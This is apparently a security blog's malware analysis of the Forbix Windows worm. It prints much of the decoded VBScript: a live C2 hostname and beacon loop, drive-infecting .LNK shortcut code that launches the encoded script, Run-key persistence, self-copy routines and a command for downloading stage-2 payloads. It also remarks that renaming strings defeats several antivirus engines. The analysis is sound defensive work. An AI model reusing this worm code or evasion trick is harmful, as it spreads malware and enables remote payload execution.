

Windows worms. Forbix worm analysis.

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Anyone heard about Forbix worm? Good. Lots of us know how difficult is to remove a worm from an infected system or network. Of course it depends on multiple factors, like: the way it spreads, persistence mechanisms, disguise techniques used once machine is infected, reinfection methods, etc. These days, when someone says “Windows worm” we usually expect a highly sophisticated piece of malware, exploiting a 0-day/1-day vulnerability and “preferably” this vulnerability being in a service listening on a specific port exposed to the whole world. May be this is the case of the worm like ransomware WannaCry, but definitely not applicable to Forbix malware.

Not so long ago (year 2019), I got hold of a PC which kept beaconing to a C2 server even after being re-imaged several times. And nope, the image was clean. Based on the domain name this malware kept trying to connect, it was very easy to determine that it is Forbix indeed. This worm is about 3 years old, written in Visual Basic and not obfuscated at all, yet it kept reappearing after that PC was re-imaged several times.

General information

Forbix is a Windows worm written purely in Visual Basic. First references about it date March 2016. Based on the sample found recently, looks like it wasn’t updated since then, however this strain is still alive even since now.

File name	Checksum	Size
Manuel.doc	d838aaf8d656b7d8d0f48d13646e677eaaad35f20	11.1K
SysinfY2X.db	d838aaf8d656b7d8d0f48d13646e677eaaad35f20	11.1K
SysinfY2X.db (decoded)	e41c395013e1a72477eb4b02429d38d0eef2e82e	10.2K

There are several states this malware can be. As described later in this article, there is are **Active** and **Passive** states. Forbix is stored on the disk in it’s passive state which is the encoded version of the actual script (VBE script). This is performed with Microsoft’s default VBScript.Encode functionality. Because of this particularity, multiple AV solutions do not flag it as malicious, as it is not a executable file.

```
$ file manuel.doc
manuel.doc: data
$ binwalk manuel.doc
```

DECIMAL	HEXADECIMAL	DESCRIPTION
0	0x0	Windows Script Encoded Data (screnc.exe)

I was surprised to see that, at the time of this writing, about a half of VirusTotal engines do not find the decoded version malicious (28/53): **MalwareBytes**, Comodo, F-Secure, F-Prot, Avira. It gets even more interesting when I change the C2 domain and the names of files this malware creates: 21/53. This time **Kaspersky**, **Microsoft Defender**, **Sophos**, **McAfee** and **ClamAV** also made into the list.

Forbix .LNK files

You are probably wondering already how this .vbe script gets executed on victims machine? Well it's all about .LNK files. They are created on an infected machine, replacing original folders.

```
"C:\Windows\system32\cmd.exe" /c start wscript /e:VBScript.Encode Manuel.doc & start explorer <REPLACED_FOLDER
```

Once double clicked this .LNK file executed the VBE Script from Manuel.doc and then opens the hidden original folder. This way most of the users never suspect that something is wrong.

Forbix SysinfY2X.db file

In its stored (*passive*) state this file is similar to Manuel.doc and is an encoded version of the malware. Because the author used default VBS encoder provided by Microsoft it is easy to obtain the original version. Thanks to [Didier Stevens for this awesome script](#).

```
python decode-vbe.py SysinfY2X.db > decoded_sysinfy2x.vbs
```

Once successfully decoded, let's analyse the script, which by the way isn't even obfuscated. From the beginning of the file we already see a bunch of global variables, which are never changed during the script execution. These can easily make into our IOCs list.

```
'<coded by Bl4cKs0cK>'
On Error Resume Next
Dim host
host = "realy.mooo.com"
Dim host_script
host_script = "bot/lancer/index.php"
Dim activ_name
activ_name = "SysinfY2X.db"
Dim passiv_name
passiv_name = "Manuel.doc"
Dim sleep_time
sleep_time = 2000
Dim sleep_time_limit
sleep_time_limit = 60000
```

Looks like the C2 Server was behind realy[.]mooo[.]com. Here an interesting fact: By changing these variables' values, **Windows Defender**, **Kaspersky** and **Sophos** AVs stop picking up this malware. Looks like we are still in the Era of Strings Searching and Matching.

Following is the main (*infinite*) loop of the worm. It runs every 2 seconds and connects to C2 server every 60 seconds. This sample has 5 major functionalities:

- Infect available drives;
- Add persistence;
- Protect itself against removal;
- Self update and execute stage 2 payload;
- C2 communications;

All these are implemented in the following functions: `infect_drives` , `infect_registre` , `protect_del` , `kill_old` , `serv_vmd` , and all of them are called inside the infinite loop.

```
While True
    infect drives
    infect registre
    protect del
    kill old("SysinfYhX.db")
    If cont < cont_limit Then
        cont = cont + 1
        wscript.sleep sleep_time
    Else
        cont = 0
        serv_rep = serv_cmd("ping")
        If serv_rep <> "-1" Then
            cont_limit = CInt(CInt(serv_rep) / sleep_time)
            serv_rep = serv_cmd(script_size & activ_name)
            If serv_rep <> "-1" Then
                If serv_rep <> "0" Then
                    get_new_v(serv_rep)
                Else
                    serv_rep = serv_cmd("list")
                    If serv_rep <> "-1" Then
                        get_list(serv_rep)
                    End If
                End If
            End If
        End If
        Else
            cont_limit = CInt(sleep_time_limit / sleep_time)
        End If
    End If
Wend
```

infect_drives() function

This function checks for all available drives and infects only **removable**, **CD-ROM** and **network drives** (DriveType: 1, 3, 4), avoiding the System Drive.

```
Sub infect_drives
    On Error Resume Next
    Dim sys_drive
    sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
    For Each cle In fs.Drives
        If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then
```

First step in drives infection is the self replication. Malware checks if the selected drive is not the System Drive and copies itself to the root directory of the drive. If Manuel.doc already exists, this file is overwritten. Also, once created, the attributes of this file are set to **ReadOnly**, **Hidden** and **System** (Attribute: 1, 2, 4).

```
If d <> sys_drive Then
  If fs.FileExists(d & "\" & passiv_name) Then
    If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace
      fs.GetFile(d & "\" & passiv_name).Attributes=2
      fs.DeleteFile d & "\" & passiv_name, True
      stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
    End If
  Else
    If cle.FreeSpace > script_size Then
      stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
    End If
  End If
  fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4
```

Next phase is about .LNK files creation and hiding original files. This also applies to folders; malware changes folders attributes making them hidden and creates .LNK files using the same name and icon. As mentioned earlier, by means of .LNK files this malware infects new machines via USB drives, CDs and Network drives.

```
For Each f In fs.GetFolder(d & "\" ).Files
  If f_ext <> ".lnk" And f.name <> passiv_name And f.Attributes <> 2+4 Then
    f.Attributes = 2+4
    If fs.FileExists(d & "\" & f.name & ".lnk") Then
      fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 0
    End If
    Dim shurt, s_icon
    Set shurt = sh.CreateShortcut(d & "\" & f.name & ".lnk")
    shurt.WindowStyle = 7
    shurt.TargetPath = "cmd.exe"
    shurt.WorkingDirectory = ""
    Dim f_arg
    f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " &
    shurt.Arguments = f_arg & " & exit"
    s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\" & f_ext & "\") & "\DefaultIcon\")
```

infect_registre() function

It is responsible for making the malware persistent. It creates one new Registry Key named with the current active name of the program inside `\Software\Microsoft\Windows\CurrentVersion\Run\` .

```
Sub infect_registre
  On Error Resume Next
  Dim target, reg_d
  target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%" & activ_name
  reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
  reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD"
End Sub
```

protect_del() function

This function is responsible to maintain an up-to-date copy of the script in Windows temporary directory, by overwriting the existing one (*if any*).

```

Function protect_del
On Error Resume Next
If fs.FileExists (tmp_dir & activ_name) Then
    If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
        fs.GetFile(tmp_dir & activ_name).Attributes=2
        stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
    End If
Else
    stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
End If
fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4

```

kill_old() function

In order to keep just one (newest) version of the worm running, function `kill_old` is called periodically to remove the remaining artifacts of the previous Forbix.A version.

```

Function kill_old(old_name)
On Error Resume Next
Dim colItems, reg_d
Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
For Each objItem in colItems
    objItem.Terminate
Next
colItems = Nothing
reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run" & Split(old_name, ".")(0)
sh.RegDelete "HKCU" & reg_d
fs.GetFile(tmp_dir & old_name).Attributes=2
fs.DeleteFile tmp_dir & "\ " & old_name, True
End Function

```

C2 communications

During the self update process, `get_new_v` and `bot_up` functions are called. These are responsible for preparing files of the new version of the worm and executing it respectively. Besides that, `bot_up` function is also used to execute stage 2 modules, which are being downloaded from the C2 server.

C2 communications with the server is implemented around 3 commands:

- `ping` - used to notify the attackers that bot is running;
- `list` - used in stage 2 infection. It contains these parameters:
 - `from` - Stage 2 payload URL;
 - `size` - Size of the payload;
 - `to` - Destination folder to copy the executable;
 - `lancer` - Optional. Specifies the way to execute the payload (wscript.exe, etc.);
- `<size><name>` - Used to get new version of malware;

Conclusion

Since early 2016 Forbix was found in the wild, infecting Windows PCs. Even if it doesn't use any sophisticated techniques to spread, persist and load payloads, multiple AV engines still fail to detect and remove it. Looks like there are still multiple requests to `realy[.]moo[.]com` domain nowadays. If you have an old USB drive and not

sure to access the files on it or not, make sure to scan it. Before opening any folder or file, check if “Manuel.doc” file exists in the root directory of the drive.

Source: <https://persianov.net/windows-worms-forbix-worm-analysis>